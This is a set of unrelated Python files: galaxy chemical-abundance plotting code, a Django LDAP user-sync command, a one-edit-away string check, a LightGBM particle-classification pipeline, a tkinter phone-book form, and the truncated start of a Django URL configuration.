mid2.append((Gas_Mg_over_H_at_all_step_list[2][i] + Star_Mg_over_H_at_all_step_list[2][i]) / 2)
mid3.append((Gas_Mg_over_H_at_all_step_list[3][i] + Star_Mg_over_H_at_all_step_list[3][i]) / 2)
mid4.append((Gas_Mg_over_H_at_all_step_list[4][i] + Star_Mg_over_H_at_all_step_list[4][i]) / 2)
(i) = (i + 1)
plt.plot(mass_list, mid0, c="blue", ls='dotted')
plt.plot(mass_list, mid1, c="green", ls='dotted')
plt.plot(mass_list, mid2, c="orange", ls='dotted')
plt.plot(mass_list, mid3, c="red", ls='dotted')
plt.plot(mass_list, mid4, c="brown", ls='dotted')
if x_axis == "dynamical":
plt.xlabel(r'log$_{10}$(galaxy dynamical mass) [M$_\odot$]')
elif x_axis == "luminous":
plt.xlabel(r'log$_{10}$(galaxy luminous mass) [M$_\odot$]')
elif x_axis == "LumDyn":
plt.xlabel(r'log$_{10}$(\sigma) [km/s]')
elif x_axis == "SFR":
plt.xlabel(r'log$_{10}$(gwSFR) [M$_\odot$/yr]')
plt.ylabel('[Mg/H]')
# plt.xlim(6.4, 1.01 * log_time_axis[-1])
# plt.ylim(-3, 0.5)
plt.tight_layout()
plt.legend(prop={'size': 10}, loc='best')
##########################
#### Plot [Mg/Fe] #####
##########################
plt.rc('font', family='serif')
plt.rc('xtick', labelsize='x-small')
plt.rc('ytick', labelsize='x-small')
fig = plt.figure(5, figsize=(6, 5.25))
ax = fig.add_subplot(1, 1, 1)
plt.plot([], [], c="k", ls='dashed', label='gas')
plt.plot([], [], c="k", label='stellar')
plt.plot([], [], c="blue", label='50 Myr')
plt.plot([], [], c="green", label='100 Myr')
plt.plot([], [], c="orange", label='500 Myr')
plt.plot([], [], c="red", label='1 Gyr')
plt.plot([], [], c="brown", label='10 Gyr')
plt.plot(mass_list, [0] * len(mass_list), ls='dotted', c='0.5', lw=3, label='Solar Value')
plt.plot([1.94, 2.48], [0.05, 0.22], ls='dashed', c='k', lw=1, label='Conroy 2014') # Conroy 2014 780-33
plt.plot([1.94, 2.48], [0.12, 0.27], ls='dashed', c='k', lw=1, label='Graves 2008') # Graves & Schiavon 2008
plt.plot([1.8, 2.48], [0.13, 0.33], ls='dashed', c='k', lw=1, label='Johansson 2012') # Johansson 2012
plt.plot([1.5, 2, 2.48], [-0.24, 0.1, 0.34], ls='dashed', c='k', lw=1, label='Recchi 2009') # Recchi 2009
if plot_gas == 1:
plt.plot(mass_list, Gas_Mg_over_Fe_at_all_step_list[0], c="blue", ls='dashed')
plt.plot(mass_list, Gas_Mg_over_Fe_at_all_step_list[1], c="green", ls='dashed')
plt.plot(mass_list, Gas_Mg_over_Fe_at_all_step_list[2], c="orange", ls='dashed')
plt.plot(mass_list, Gas_Mg_over_Fe_at_all_step_list[3], c="red", ls='dashed')
plt.plot(mass_list, Gas_Mg_over_Fe_at_all_step_list[4], c="brown", ls='dashed')
if plot_star == 1:
plt.plot(mass_list, Star_Mg_over_Fe_at_all_step_list[0], c="blue")
plt.plot(mass_list, Star_Mg_over_Fe_at_all_step_list[1], c="green")
plt.plot(mass_list, Star_Mg_over_Fe_at_all_step_list[2], c="orange")
plt.plot(mass_list, Star_Mg_over_Fe_at_all_step_list[3], c="red")
plt.plot(mass_list, Star_Mg_over_Fe_at_all_step_list[4], c="brown")
if plot_mid == 1:
mid0 = []
mid1 = []
mid2 = []
mid3 = []
mid4 = []
i = 0
while i < len(Gas_Mg_over_Fe_at_all_step_list[0]):
mid0.append((Gas_Mg_over_Fe_at_all_step_list[0][i] + Star_Mg_over_Fe_at_all_step_list[0][i]) / 2)
mid1.append((Gas_Mg_over_Fe_at_all_step_list[1][i] + Star_Mg_over_Fe_at_all_step_list[1][i]) / 2)
mid2.append((Gas_Mg_over_Fe_at_all_step_list[2][i] + Star_Mg_over_Fe_at_all_step_list[2][i]) / 2)
mid3.append((Gas_Mg_over_Fe_at_all_step_list[3][i] + Star_Mg_over_Fe_at_all_step_list[3][i]) / 2)
mid4.append((Gas_Mg_over_Fe_at_all_step_list[4][i] + Star_Mg_over_Fe_at_all_step_list[4][i]) / 2)
(i) = (i + 1)
plt.plot(mass_list, mid0, c="blue", ls='dotted')
plt.plot(mass_list, mid1, c="green", ls='dotted')
plt.plot(mass_list, mid2, c="orange", ls='dotted')
plt.plot(mass_list, mid3, c="red", ls='dotted')
plt.plot(mass_list, mid4, c="brown", ls='dotted')
if x_axis == "dynamical":
plt.xlabel(r'log$_{10}$(galaxy dynamical mass) [M$_\odot$]')
elif x_axis == "luminous":
plt.xlabel(r'log$_{10}$(galaxy luminous mass) [M$_\odot$]')
elif x_axis == "LumDyn":
plt.xlabel(r'log$_{10}$(\sigma) [km/s]')
elif x_axis == "SFR":
plt.xlabel(r'log$_{10}$(gwSFR) [M$_\odot$/yr]')
plt.ylabel('[Mg/Fe]')
# plt.xlim(6.4, 1.01 * log_time_axis[-1])
# plt.ylim(-3, 0.5)
plt.tight_layout()
plt.legend(prop={'size': 10}, loc='best')
##########################
#### Plot [O/Fe] #####
##########################
plt.rc('font', family='serif')
plt.rc('xtick', labelsize='x-small')
plt.rc('ytick', labelsize='x-small')
fig = plt.figure(6, figsize=(6, 5.25))
ax = fig.add_subplot(1, 1, 1)
plt.plot([], [], c="k", ls='dashed', label='gas')
plt.plot([], [], c="k", label='stellar')
plt.plot([], [], c="blue", label='50 Myr')
plt.plot([], [], c="green", label='100 Myr')
plt.plot([], [], c="orange", label='500 Myr')
plt.plot([], [], c="red", label='1 Gyr')
plt.plot([], [], c="brown", label='10 Gyr')
plt.plot(mass_list, [0] * len(mass_list), ls='dotted', c='0.5', lw=3, label='Solar Value')
plt.plot([1.94, 2.48], [0.03, 0.28], ls='dashed', c='k', lw=1, label='Conroy 2014') # Conroy 2014 780-33
plt.plot([1.8, 2.4], [0.1, 0.25], ls='dashed', c='k', lw=1, label='Johansson 2012') # Johansson 2012
plt.plot([1.5, 2, 2.48], [-0.24, 0.1, 0.34], ls='dashed', c='k', lw=1, label='Recchi 2009') # Recchi 2009
if plot_gas == 1:
plt.plot(mass_list, Gas_O_over_Fe_at_all_step_list[0], c="blue", ls='dashed')
plt.plot(mass_list, Gas_O_over_Fe_at_all_step_list[1], c="green", ls='dashed')
plt.plot(mass_list, Gas_O_over_Fe_at_all_step_list[2], c="orange", ls='dashed')
plt.plot(mass_list, Gas_O_over_Fe_at_all_step_list[3], c="red", ls='dashed')
plt.plot(mass_list, Gas_O_over_Fe_at_all_step_list[4], c="brown", ls='dashed')
if plot_star == 1:
plt.plot(mass_list, Star_O_over_Fe_at_all_step_list[0], c="blue")
plt.plot(mass_list, Star_O_over_Fe_at_all_step_list[1], c="green")
plt.plot(mass_list, Star_O_over_Fe_at_all_step_list[2], c="orange")
plt.plot(mass_list, Star_O_over_Fe_at_all_step_list[3], c="red")
plt.plot(mass_list, Star_O_over_Fe_at_all_step_list[4], c="brown")
if plot_mid == 1:
mid0 = []
mid1 = []
mid2 = []
mid3 = []
mid4 = []
i = 0
while i < len(Gas_O_over_Fe_at_all_step_list[0]):
mid0.append((Gas_O_over_Fe_at_all_step_list[0][i] + Star_O_over_Fe_at_all_step_list[0][i]) / 2)
mid1.append((Gas_O_over_Fe_at_all_step_list[1][i] + Star_O_over_Fe_at_all_step_list[1][i]) / 2)
mid2.append((Gas_O_over_Fe_at_all_step_list[2][i] + Star_O_over_Fe_at_all_step_list[2][i]) / 2)
mid3.append((Gas_O_over_Fe_at_all_step_list[3][i] + Star_O_over_Fe_at_all_step_list[3][i]) / 2)
mid4.append((Gas_O_over_Fe_at_all_step_list[4][i] + Star_O_over_Fe_at_all_step_list[4][i]) / 2)
(i) = (i + 1)
plt.plot(mass_list, mid0, c="blue", ls='dotted')
plt.plot(mass_list, mid1, c="green", ls='dotted')
plt.plot(mass_list, mid2, c="orange", ls='dotted')
plt.plot(mass_list, mid3, c="red", ls='dotted')
plt.plot(mass_list, mid4, c="brown", ls='dotted')
if x_axis == "dynamical":
plt.xlabel(r'log$_{10}$(galaxy dynamical mass) [M$_\odot$]')
elif x_axis == "luminous":
plt.xlabel(r'log$_{10}$(galaxy luminous mass) [M$_\odot$]')
elif x_axis == "LumDyn":
plt.xlabel(r'log$_{10}$(\sigma) [km/s]')
elif x_axis == "SFR":
plt.xlabel(r'log$_{10}$(gwSFR) [M$_\odot$/yr]')
plt.ylabel('[O/Fe]')
# plt.xlim(6.4, 1.01 * log_time_axis[-1])
# plt.ylim(-3, 0.5)
plt.tight_layout()
plt.legend(prop={'size': 10}, loc='best')
##########################
#### Plot [O/H] #####
##########################
plt.rc('font', family='serif')
plt.rc('xtick', labelsize='x-small')
plt.rc('ytick', labelsize='x-small')
fig = plt.figure(7, figsize=(6, 5.25))
ax = fig.add_subplot(1, 1, 1)
plt.plot([], [], c="k", ls='dashed', label='gas')
plt.plot([], [], c="k", label='stellar')
plt.plot([], [], c="blue", label='50 Myr')
plt.plot([], [], c="green", label='100 Myr')
plt.plot([], [], c="orange", label='500 Myr')
plt.plot([], [], c="red", label='1 Gyr')
plt.plot([], [], c="brown", label='10 Gyr')
plt.plot(mass_list, [0] * len(mass_list), ls='dotted', c='0.5', lw=3,
label='Solar Value')
if plot_gas == 1:
plt.plot(mass_list, Gas_O_over_H_at_all_step_list[0], c="blue", ls='dashed')
plt.plot(mass_list, Gas_O_over_H_at_all_step_list[1], c="green", ls='dashed')
plt.plot(mass_list, Gas_O_over_H_at_all_step_list[2], c="orange", ls='dashed')
plt.plot(mass_list, Gas_O_over_H_at_all_step_list[3], c="red", ls='dashed')
plt.plot(mass_list, Gas_O_over_H_at_all_step_list[4], c="brown", ls='dashed')
if plot_star == 1:
plt.plot(mass_list, Star_O_over_H_at_all_step_list[4], c="brown")
plt.plot(mass_list, Star_O_over_H_at_all_step_list[3], c="red")
plt.plot(mass_list, Star_O_over_H_at_all_step_list[2], c="orange")
plt.plot(mass_list, Star_O_over_H_at_all_step_list[1], c="green")
plt.plot(mass_list, Star_O_over_H_at_all_step_list[0], c="blue")
if plot_mid == 1:
mid0 = []
mid1 = []
mid2 = []
mid3 = []
mid4 = []
i = 0
while i < len(Gas_O_over_H_at_all_step_list[0]):
mid0.append((Gas_O_over_H_at_all_step_list[0][i] + Star_O_over_H_at_all_step_list[0][i]) / 2)
mid1.append((Gas_O_over_H_at_all_step_list[1][i] + Star_O_over_H_at_all_step_list[1][i]) / 2)
mid2.append((Gas_O_over_H_at_all_step_list[2][i] + Star_O_over_H_at_all_step_list[2][i]) / 2)
mid3.append((Gas_O_over_H_at_all_step_list[3][i] + Star_O_over_H_at_all_step_list[3][i]) / 2)
mid4.append((Gas_O_over_H_at_all_step_list[4][i] + Star_O_over_H_at_all_step_list[4][i]) / 2)
(i) = (i + 1)
plt.plot(mass_list, mid0, c="blue", ls='dotted')
plt.plot(mass_list, mid1, c="green", ls='dotted')
plt.plot(mass_list, mid2, c="orange", ls='dotted')
plt.plot(mass_list, mid3, c="red", ls='dotted')
plt.plot(mass_list, mid4, c="brown", ls='dotted')
if x_axis == "dynamical":
plt.xlabel(r'log$_{10}$(galaxy dynamical mass) [M$_\odot$]')
elif x_axis == "luminous":
plt.xlabel(r'log$_{10}$(galaxy luminous mass) [M$_\odot$]')
elif x_axis == "LumDyn":
plt.xlabel(r'log$_{10}$(\sigma) [km/s]')
elif x_axis == "SFR":
plt.xlabel(r'log$_{10}$(gwSFR) [M$_\odot$/yr]')
plt.ylabel('[O/H]')
# plt.xlim(6.4, 1.01 * log_time_axis[-1])
# plt.ylim(-3, 0.5)
plt.tight_layout()
plt.legend(prop={'size': 10}, loc='best')
#########################
plt.show()
# plt.rc('font', family='serif')
# plt.rc('xtick', labelsize='x-small')
# plt.rc('ytick', labelsize='x-small')
# fig = plt.figure(2, figsize=(6, 5.25))
# ax = fig.add_subplot(1, 1, 1)
# plt.plot(time, Gas_Fe_over_H, label='Gas [Fe/H]')
# plt.plot(time, Star_Fe_over_H, label='Star [Fe/H]')
# plt.plot(time, Gas_Mg_over_H, label='Gas [Mg/H]')
# plt.plot(time, Star_Mg_over_H, label='Star [Mg/H]')
# plt.xlabel(r'age [yr]')
# plt.ylabel('[Metal/H]')
# # plt.xlim(6.4, 1.01 * log_time_axis[-1])
# plt.ylim(-3, 0.5)
# plt.tight_layout()
# plt.legend(prop={'size': 10}, loc='best')
# plt.show()
return
if __name__ == '__main__':
    # x_axis options: "dynamical", "luminous", "LumDyn", or "SFR".
    # LumDyn follows Burstein et al. 1997: sigma = 0.86 * (M_lum)^0.22
    plot(plot_star=1, plot_gas=1, plot_mid=0, x_axis="LumDyn",
         SFE=[0.5, 0.5, 0.5, 0.5, 0.5, 0.5],
         log_SFR=[-1, 0, 1, 2, 3, 4], IMF="igimf")
|
from django.core.management.base import BaseCommand
from django.contrib.auth import get_user_model
from django_auth_sgf.backend import SGFBackend
class Command(BaseCommand):
    """Sync RA and Hall Staff users from LDAP into the local user table."""
    help = 'Syncs the RA and Hall Staff users'

    def handle(self, *args, **options):
        # Find all HallStaff and RAs to update them first (in case any are
        # missing locally), then repopulate the data for every other user
        # already in EXDB.
        ldap_backend = SGFBackend()
        already_populated_usernames = set()
        # TODO: Ideally this would just read from the USER_FLAGS_BY_GROUP setting
        for group in ('RL-RESLIFE-HallStaff', 'RL-RESLIFE-RA'):
            # Add/update each member of the group.
            for username in get_group_members(group):
                user = ldap_backend.populate_user(username)
                already_populated_usernames.add(user.username)
        # Update everyone else already present locally (the returned user
        # object is not needed here, so it is deliberately not bound).
        remaining = (get_user_model().objects
                     .exclude(username__in=already_populated_usernames)
                     .values_list('username', flat=True))
        for username in remaining:
            ldap_backend.populate_user(username)
def get_group_members(group):
    """Return the set of usernames in *group*, including members of any
    groups nested (transitively) inside it."""
    backend = SGFBackend()
    settings = backend.settings
    ldap = backend.ldap
    # Open and bind an LDAP connection.
    connection = ldap.initialize(settings.SERVER_URI)
    connection.set_option(ldap.OPT_PROTOCOL_VERSION, ldap.VERSION3)
    connection.set_option(ldap.OPT_REFERRALS, 0)
    connection.bind_s(settings.BIND_DN, settings.BIND_PASSWORD)
    # Resolve the DN of the requested group (first search result).
    root_search = settings.GROUP_SEARCH.search_with_additional_terms({'cn': group})
    frontier = {list(root_search.execute(connection))[0][0]}
    seen = set(frontier)
    # Walk the nested groups breadth-first until no new DNs turn up.
    while frontier:
        member_filter = '(|%s)' % ''.join('(memberof=%s)' % dn for dn in frontier)
        nested_search = settings.GROUP_SEARCH.search_with_additional_term_string(member_filter)
        frontier = {entry[0] for entry in nested_search.execute(connection)}
        seen |= frontier
    # Fetch every person that is a member of any discovered group.
    person_filter = '(&(objectClass=person)(|%s))' % ''.join('(memberof=%s)' % dn for dn in seen)
    user_search = settings.USER_SEARCH.search_with_additional_term_string('')  # copy of the original
    if hasattr(user_search, 'searches'):
        # LDAPSearchUnion: patch the filter on each sub-search.
        for sub_search in user_search.searches:
            sub_search.filterstr = person_filter
    else:
        # Plain LDAPSearch.
        user_search.filterstr = person_filter
    return {entry[1]['cn'][0] for entry in user_search.execute(connection)}
|
'''
Time O(n)
Space O(1)
'''
def isOneEditAway(str1, str2):
    """Return True if str1 and str2 differ by at most one edit
    (replace, insert, or remove a single character)."""
    # More than one character of length difference always needs >1 edit.
    if abs(len(str1) - len(str2)) > 1:
        return False
    # Equal lengths: only a single replacement can bridge them.
    if len(str1) == len(str2):
        return isOneReplaceAway(str1, str2, "edit")
    # Lengths differ by one: check with the longer string first.
    longer, shorter = (str1, str2) if len(str1) > len(str2) else (str2, str1)
    return isOneReplaceAway(longer, shorter, "add")
def isOneReplaceAway(str1, str2, operation):
    """Return True if str2 is reachable from str1 with at most one edit.

    operation == "edit": str1 and str2 have equal length; allow one
    character replacement.
    operation == "add": str1 is exactly one character longer than str2;
    allow one character of str1 to be skipped.
    """
    idx1 = 0
    idx2 = 0
    isEdited = False
    # Fix: also guard idx2. In "add" mode str1 is longer, and without the
    # guard an extra *trailing* character in str1 (e.g. "pale" vs "pal")
    # made str2[idx2] raise IndexError.
    while idx1 < len(str1) and idx2 < len(str2):
        if str1[idx1] != str2[idx2]:
            if isEdited:
                return False
            isEdited = True
            if operation == "add":
                # Skip the extra character in the longer string only.
                idx1 += 1
                continue
        idx1 += 1
        idx2 += 1
    # Any single leftover character in str1 is the one allowed removal.
    return True
# Quick manual checks (CtCI 1.5 style examples).
for first, second in (("pale", "bale"),
                      ("pale", "ple"),
                      ("ple", "pale"),
                      ("kalp", "pale"),
                      ("please", "pale")):
    print(isOneEditAway(first, second))
|
# I decided to convert Jupyter notebook to ordinary python script for straightforward evaluation
import numpy as np
import pandas as pd
import json
from sklearn.model_selection import train_test_split, StratifiedKFold
from sklearn.preprocessing import MinMaxScaler, StandardScaler
from lightgbm.sklearn import LGBMClassifier
import scoring # local file
# Load the column-name -> dtype mapping and convert its string values back
# into actual numpy/python types (json.load reads straight from the file
# handle instead of read() + loads()).
with open('type_converter_dict.json', 'r') as f:
    type_converter = json.load(f)
revert_to_type = {
    'np.int32': np.int32,
    'np.float32': np.float32,
    'object': object,
}
for key in type_converter:
    type_converter[key] = revert_to_type[type_converter[key]]
# Skip the per-hit FOI_hits_* array columns, keeping only the scalar count.
columns = [key for key in type_converter if not key.startswith('FOI_hits_') or key == 'FOI_hits_N']
data1 = pd.read_csv('../data/train_part_1_v2.csv.gz', dtype=type_converter, usecols=columns, index_col='id')
data2 = pd.read_csv('../data/train_part_2_v2.csv.gz', dtype=type_converter, usecols=columns, index_col='id')
data = pd.concat((data1, data2), axis=0, ignore_index=True)
# Explicitly release the two partial frames (clearer than rebinding to 0).
del data1, data2
# The test set has no labels/weights; drop the train-only columns.
# (A - (A & B) is just A - B.)
test_columns = list(set(columns) - {'weight', 'label', 'sWeight', 'kinWeight', 'particle_type'})
test_final = pd.read_csv('../data/test_private_v3_track_1.csv.gz', usecols=test_columns, index_col='id')
# preprocessing functions
def add_null_feature(data):
    """Flag rows where stations 2/3 carry the -9999 missing-hit sentinel."""
    for station in (2, 3):
        missing = data['MatchedHit_X[%i]' % station] == -9999
        data['miss_%i' % station] = missing.astype(int)
    return data
def set_null_xy(data):
    # Impute missing station-2/3 coordinates (sentinel -9999) from the
    # earlier stations' values.
    idx = data['MatchedHit_X[2]'] == -9999
    data.loc[idx, 'MatchedHit_X[2]'] = data[idx]['MatchedHit_X[1]'] - data[idx]['MatchedHit_X[0]']
    # NOTE(review): this line reads the X[2] value assigned just above —
    # presumably intentional chaining, but confirm.
    data.loc[idx, 'MatchedHit_X[3]'] = data[idx]['MatchedHit_X[2]'] - data[idx]['MatchedHit_X[1]']
    # NOTE(review): the Y columns below are filled from *X* values — this
    # looks like a copy-paste slip (expected MatchedHit_Y[...] on the RHS),
    # and only rows flagged by a missing X[2] are touched. Do not "fix"
    # without retraining: the submitted model was fitted with this behavior.
    data.loc[idx, 'MatchedHit_Y[2]'] = data[idx]['MatchedHit_X[1]'] - data[idx]['MatchedHit_X[0]']
    data.loc[idx, 'MatchedHit_Y[3]'] = data[idx]['MatchedHit_X[2]'] - data[idx]['MatchedHit_X[1]']
    return data
def set_uncrossed_time(data):
    """Replace the delta-time of uncrossed hits (TYPE 0 or 1) with 15."""
    for station in range(4):
        uncrossed = data['MatchedHit_TYPE[%i]' % station].isin((0, 1))
        data.loc[uncrossed, 'MatchedHit_DT[%i]' % station] = 15
    return data
def add_growing_time(data):
    """Add 'time_grows': 1 when hit times are non-decreasing across the
    four stations and the last time is not the 255 sentinel, else 0."""
    times = [data['MatchedHit_T[%i]' % i] for i in range(4)]
    ordered = (times[0] <= times[1]) & (times[1] <= times[2]) & (times[2] <= times[3])
    data['time_grows'] = (ordered & (times[3] != 255)).astype(int)
    return data
def add_sum_dtime(data):
    """Add 'sum_dtime': total delta-time over the four stations.

    Uses a chained '+' (not DataFrame.sum) so NaNs propagate exactly as in
    plain column arithmetic.
    """
    total = data['MatchedHit_DT[0]']
    for station in (1, 2, 3):
        total = total + data['MatchedHit_DT[%i]' % station]
    data['sum_dtime'] = total
    return data
def add_diff_xy(data):
    """Add 'div_x'/'div_y': sum of squared deviations of consecutive
    inter-station hit spacings from their median, beyond a pad-size
    tolerance of (D[i+1] + D[i]) / 4, clipped to [0, 9000] before squaring.

    Fix: the divergence Series are built with ``index=data.index``.
    Previously they carried a default RangeIndex, so ``pd.concat(axis=1)``
    misaligned rows (producing NaNs and an index union) on frames indexed
    by 'id' such as ``test_final``.
    """
    def _divergence(axis):
        # One pass shared by X and Y (the original duplicated this block).
        pos = [data['MatchedHit_%s[%i]' % (axis, i)] for i in range(4)]
        pad = [data['MatchedHit_D%s[%i]' % (axis, i)] for i in range(4)]
        steps = [pos[i + 1] - pos[i] for i in range(3)]
        med = np.abs(np.median(steps, axis=0))
        diffs = [np.abs(np.abs(steps[i]) - med) - (pad[i + 1] + pad[i]) / 4
                 for i in range(3)]
        diffs = np.clip(diffs, a_min=0, a_max=9000)
        return np.sum(np.square(diffs), axis=0)
    return pd.concat((data,
                      pd.Series(_divergence('X'), index=data.index, name='div_x'),
                      pd.Series(_divergence('Y'), index=data.index, name='div_y')), axis=1)
def add_Lextra_dirs(data):
    """Add the extrapolated-track direction: last minus first Lextra point."""
    direction_x = data['Lextra_X[3]'] - data['Lextra_X[0]']
    direction_y = data['Lextra_Y[3]'] - data['Lextra_Y[0]']
    return pd.concat((data,
                      direction_x.rename('lextra_dir_x'),
                      direction_y.rename('lextra_dir_y')), axis=1)
def add_MatchedHit_dirs(data):
    """Add 'matched_dir_x'/'matched_dir_y': the median step between
    consecutive matched-hit station positions.

    Fix: ``np.median`` returns a bare ndarray, so the wrapping Series got a
    default RangeIndex and ``pd.concat(axis=1)`` misaligned rows on frames
    indexed by 'id' (e.g. ``test_final``); ``index=data.index`` restores
    the intended row alignment.
    """
    def _median_step(axis):
        cols = [data['MatchedHit_%s[%i]' % (axis, i)] for i in range(4)]
        return np.median([cols[1] - cols[0],
                          cols[2] - cols[1],
                          cols[3] - cols[2]], axis=0)
    return pd.concat((data,
                      pd.Series(_median_step('X'), index=data.index, name='matched_dir_x'),
                      pd.Series(_median_step('Y'), index=data.index, name='matched_dir_y')), axis=1)
def add_Lextra_Matched_diffs_relative(data):
    """Add the absolute relative difference between the extrapolated and
    matched-hit track directions, per axis."""
    relative = {}
    for axis in ('x', 'y'):
        lextra = data['lextra_dir_%s' % axis]
        matched = data['matched_dir_%s' % axis]
        relative[axis] = np.abs((lextra - matched) / matched)
    return pd.concat((data,
                      relative['x'].rename('LM_diff_x_rel'),
                      relative['y'].rename('LM_diff_y_rel')), axis=1)
def drop_MatchedHit_DZ_FEATURES(data):
    """Remove the four per-station MatchedHit_DZ columns."""
    dz_columns = ['MatchedHit_DZ[%i]' % i for i in range(4)]
    return data.drop(dz_columns, axis=1)
def basic_preprocess(data):
    """Run the feature-engineering pipeline shared by train and test data."""
    pipeline = (add_null_feature,
                set_null_xy,
                set_uncrossed_time,
                add_growing_time,
                add_sum_dtime,
                add_diff_xy,
                add_Lextra_dirs,
                add_MatchedHit_dirs,
                add_Lextra_Matched_diffs_relative,
                drop_MatchedHit_DZ_FEATURES)
    for step in pipeline:
        data = step(data)
    # Re-encode ndof {4, 6, 8} as ordinal {0, 1, 2}.
    data['ndof'] = data['ndof'].map({4: 0, 6: 1, 8: 2})
    # Cap NShared at 2 (values >= 3 become 2).
    data['NShared'] = data['NShared'].where(data['NShared'] < 3, 2)
    return data
def train_preprocess(data):
    """Preprocess the training frame (currently just basic_preprocess)."""
    return basic_preprocess(data)
def test_preprocess(data):
    """Preprocess the test frame (currently just basic_preprocess)."""
    return basic_preprocess(data)
def get_data_train(data):
    """Return the feature matrix: everything but the label/weight columns."""
    non_feature_columns = ['kinWeight', 'label', 'particle_type', 'sWeight', 'weight']
    return data.drop(non_feature_columns, axis=1)
# Continuous columns to standardize: the raw detector features plus the
# engineered ones added in basic_preprocess. Categorical/flag columns
# (ndof, NShared, miss_*, time_grows, MatchedHit_TYPE[*]) are deliberately
# excluded.
scaling_columns = ['ncl[0]', 'ncl[1]', 'ncl[2]', 'ncl[3]', 'avg_cs[0]', 'avg_cs[1]',
                   'avg_cs[2]', 'avg_cs[3]',
                   'MatchedHit_X[0]', 'MatchedHit_X[1]', 'MatchedHit_X[2]',
                   'MatchedHit_X[3]', 'MatchedHit_Y[0]', 'MatchedHit_Y[1]',
                   'MatchedHit_Y[2]', 'MatchedHit_Y[3]', 'MatchedHit_Z[0]',
                   'MatchedHit_Z[1]', 'MatchedHit_Z[2]', 'MatchedHit_Z[3]',
                   'MatchedHit_DX[0]', 'MatchedHit_DX[1]', 'MatchedHit_DX[2]',
                   'MatchedHit_DX[3]', 'MatchedHit_DY[0]', 'MatchedHit_DY[1]',
                   'MatchedHit_DY[2]', 'MatchedHit_DY[3]', 'MatchedHit_T[0]',
                   'MatchedHit_T[1]', 'MatchedHit_T[2]', 'MatchedHit_T[3]',
                   'MatchedHit_DT[0]', 'MatchedHit_DT[1]', 'MatchedHit_DT[2]',
                   'MatchedHit_DT[3]', 'Lextra_X[0]', 'Lextra_X[1]', 'Lextra_X[2]',
                   'Lextra_X[3]', 'Lextra_Y[0]', 'Lextra_Y[1]', 'Lextra_Y[2]',
                   'Lextra_Y[3]', 'Mextra_DX2[0]', 'Mextra_DX2[1]',
                   'Mextra_DX2[2]', 'Mextra_DX2[3]', 'Mextra_DY2[0]', 'Mextra_DY2[1]',
                   'Mextra_DY2[2]', 'Mextra_DY2[3]', 'PT', 'P',
                   'sum_dtime', 'div_x', 'div_y', 'lextra_dir_x',
                   'lextra_dir_y', 'matched_dir_x', 'matched_dir_y', 'LM_diff_x_rel',
                   'LM_diff_y_rel']
# One StandardScaler per column, fitted on train (scale_fit) and reused on
# test (scale_transform).
stdscalers = {col:StandardScaler() for col in scaling_columns}
def scale_fit(data):
    """Fit the shared per-column StandardScalers on *data* (train only)."""
    for column in scaling_columns:
        column_values = data[column].values.reshape(-1, 1)
        stdscalers[column].fit(column_values)
    return data
def scale_transform(data):
    """Standardize *data* in place using the scalers fitted by scale_fit."""
    for column in scaling_columns:
        column_values = data[column].values.reshape(-1, 1)
        data[column] = stdscalers[column].transform(column_values)
    return data
def train_kfold_lgbms(X, y, weights, n_folds=3):
    """Train one LGBMClassifier per stratified fold and return the list."""
    def _make_model():
        return LGBMClassifier(n_estimators=800,
                              learning_rate=0.2,
                              min_data_in_leaf=200,
                              max_depth=8,
                              num_leaves=80,
                              max_bin=256,
                              importance_type='gain')
    lgbms = [_make_model() for _ in range(n_folds)]
    skf = StratifiedKFold(n_splits=n_folds)
    categorical = ['ndof', 'NShared', 'miss_2', 'miss_3', 'time_grows',
                   'MatchedHit_TYPE[0]', 'MatchedHit_TYPE[1]',
                   'MatchedHit_TYPE[2]', 'MatchedHit_TYPE[3]']
    for fold, (train_index, valid_index) in enumerate(skf.split(X, y)):
        # Per-sample weights: absolute values, clipped at 100.
        fold_weights = np.abs(weights.loc[X.iloc[train_index].index.values])
        fold_weights[fold_weights > 100] = 100
        # NOTE: the random seed was never fixed, so results are not
        # reproducible run-to-run.
        lgbms[fold].fit(X.iloc[train_index], y.iloc[train_index],
                        eval_set=(X.iloc[valid_index], y.iloc[valid_index]),
                        early_stopping_rounds=10,
                        categorical_feature=categorical,
                        verbose=10,
                        sample_weight=fold_weights)
        print('trained {0}/{1}'.format(fold + 1, n_folds))
    return lgbms
def get_kfold_prediction(models, X_test):
    """Return an array of shape (len(models), n_rows) holding each model's
    positive-class probability for every row of X_test."""
    fold_probs = [model.predict_proba(X_test)[:, 1] for model in models]
    return np.array(fold_probs)
# train
# Feature-engineer the training frame, split features from the
# label/weight columns, fit the per-column scalers on train only, then
# train 4 stratified LightGBM folds (sample-weighted, clipped at 100).
data = train_preprocess(data)
data_train = get_data_train(data)
# Keep only the label/weight columns; the features now live in data_train.
data = data[['kinWeight', 'label', 'particle_type', 'sWeight', 'weight']]
scale_fit(data_train)
data_train = scale_transform(data_train)
lgbms = train_kfold_lgbms(data_train, data['label'], data['weight'], 4)
# test
# Apply the identical preprocessing/scaling to the private test set,
# average the per-fold probabilities, and write the submission CSV.
test_final = test_preprocess(test_final)
test_final = scale_transform(test_final)
predictions_lgbm = get_kfold_prediction(models=lgbms, X_test=test_final)
pred_lgbm = predictions_lgbm.mean(axis=0)
pd.DataFrame(data={"prediction": pred_lgbm}, index=test_final.index).to_csv("../pre_final_submission.csv", index_label='id')
|
from tkinter import *
import tkinter.messagebox as msgbox
def savetofile():
    """Append the current name and phone entries to telefonnummer.txt."""
    # 'with' guarantees the file is closed even if the write fails
    # (the original leaked the handle on an exception); UTF-8 is pinned so
    # non-ASCII names are stored consistently across platforms.
    with open("telefonnummer.txt", "a", encoding="utf-8") as f:
        f.write(entName.get() + " " + entTele.get() + "\n")
# Build a minimal two-field phone-book form: a name row, a phone row, and
# a save button (labels are in Swedish: "Namn" = name, "Tele" = phone).
root = Tk()
lblName = Label(root, text="Namn : ")
lblName.grid(row=0, column=0)
lblTele = Label(root, text="Tele: ")
lblTele.grid(row=1,column=0)
entName = Entry(root)
entName.grid(row=0, column=1)
entTele = Entry(root)
entTele.grid(row=1, column=1)
# "Spara till fil!" = "Save to file!"; clicking appends both entries to
# telefonnummer.txt via savetofile.
btnSave = Button(root, text="Spara till fil!", command=savetofile)
btnSave.grid(row=2, column=0, columnspan=2)
root.mainloop()
|
from django.db import router
from django.urls import path
from django.urls.conf import include
from .views import eliminar_juego, index, modificar_juego
from .views import formulario
from .views import galeria
from .views import listado_juegos
from .views import nuevo_juego
from .views import JuegoViewSet
from rest_framework import routers
# DRF router exposing JuegoViewSet as a REST API under api/juegos/.
# NOTE(review): this rebinds the name `router` imported from django.db
